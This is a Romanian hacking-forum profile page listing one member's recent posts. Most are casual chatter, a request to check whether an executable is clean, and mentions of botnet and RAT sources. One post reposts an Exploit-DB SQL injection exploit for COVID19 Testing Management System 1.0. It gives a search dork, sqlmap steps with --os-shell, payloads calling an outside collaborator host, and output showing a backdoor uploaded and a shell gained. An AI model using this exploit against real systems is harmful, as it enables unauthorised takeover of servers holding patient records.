
GabrielRo
Members-
Posts
23 -
Joined
-
Last visited
-
Days Won
2
GabrielRo last won the day on December 15 2021
GabrielRo had the most liked content!
Reputation
17 GoodAbout GabrielRo
-
Rank
Enthusiast
Profile Information
-
Gender
Male
Recent Profile Visitors
The recent visitors block is disabled and is not being shown to other users.
-
Mulțumesc, succes și ție.
-
Va salut, imi puteti spune va rog daca este clean acest exe, si nu are nimic ascuns in acel exe.. Va multumesc! https://www.virustotal.com/gui/file/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d https://www.hybrid-analysis.com/sample/b9a187b59c758ead0022e50bbaae4133d2e37b769a054249afc0b6aa2e26774d
-
Bună dimineața..... 😐
-
Baaa. 😅
-
Asa este, totul ce se găsește aici public, găsești și acolo.. surse bubuite de Botnet IRC Rxbot, de la programe scrise în Visual Basic Dos Attack.
-
Sunt vaccinat, si ma voi mai vaccina daca trebuie. Si nu bag in seama ce zice șoșoacă.
-
https://pasteboard.co/MTYkd9IZ1lxD.jpg 🌡😂
-
Nu l-am instalat inca, urmeaza sa il instalez.
-
Saefko Attack Systems Pro (Windows + Android) Botnet/RAT
GabrielRo replied to dannybest's topic in Programe hacking
Bro este din 2019 topicul. 🙈😅 -
Ciudat.. 🤔
-
https://www.digi24.ro/stiri/sci-tech/whatsapp-facebook-si-instagram-au-picat-la-nivel-mondial-1689813 🤔🙄
-
Vulnerable App: # Exploit Title: COVID19 Testing Management System 1.0 - 'searchdata' SQL Injection # Google Dork: intitle: "COVID19 Testing Management System" # Date: 09/08/2021 # Exploit Author: Ashish Upsham # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows Description: The COVID19 Testing Management System 1.0 application from PHPgurukul is vulnerable to SQL injection via the 'searchdata' parameter on the patient-search-report.php page. ==================== 1. SQLi ==================== http://192.168.0.107:80/covid-tms/patient-search-report.php The "searchdata" parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated user has the full ability to run system commands via --os-shell and fully compromise the system POST parameter 'searchdata' is vulnerable. step 1 : Navigate to the "Test Report >> Search Report" and enter any random value & capture the request in the proxy tool. step 2 : Now copy the post request and save it as test.txt file. step 3 : Run the sqlmap command "sqlmap -r test.txt -p searchdata --os-shell" ---------------------------------------------------------------------- Parameter: searchdata (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') AND (SELECT 4105 FROM (SELECT(SLEEP(5)))BzTl) AND ('Rxmr'='Rxmr&search=Search Type: UNION query Title: Generic UNION query (NULL) - 5 columns Payload: searchdata=809262'+(select load_file('yhj3lhp8nhgr0sb7nf7ma0d0wr2hq6.burpcollaborator.net'))+'') UNION ALL SELECT NULL,NULL,CONCAT(0x716a767071,0x59514b74537665486a414263557053556875425a6543647144797a5a497a7043766e597a484e6867,0x7176767871),NULL,NULL,NULL,NULL-- -&search=Search [19:14:14] [INFO] trying to upload the file stager on '/xampp/htdocs/' via UNION method [19:14:14] [INFO] the remote file '/xampp/htdocs/tmpuptfn.php' is larger (714 B) than the local file '/tmp/sqlmap_tng5cao28/tmpaw4yplu2' (708B) [19:14:14] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpuptfn.php [19:14:14] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://192.168.0.107:80/tmpbmclp.php[19:14:14] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER os-shell> whoami do you want to retrieve the command standard output? [Y/n/a] y command standard output: 'laptop-ashish\ashish' os-shell> Sursa: https://www.exploit-db.com/exploits/50190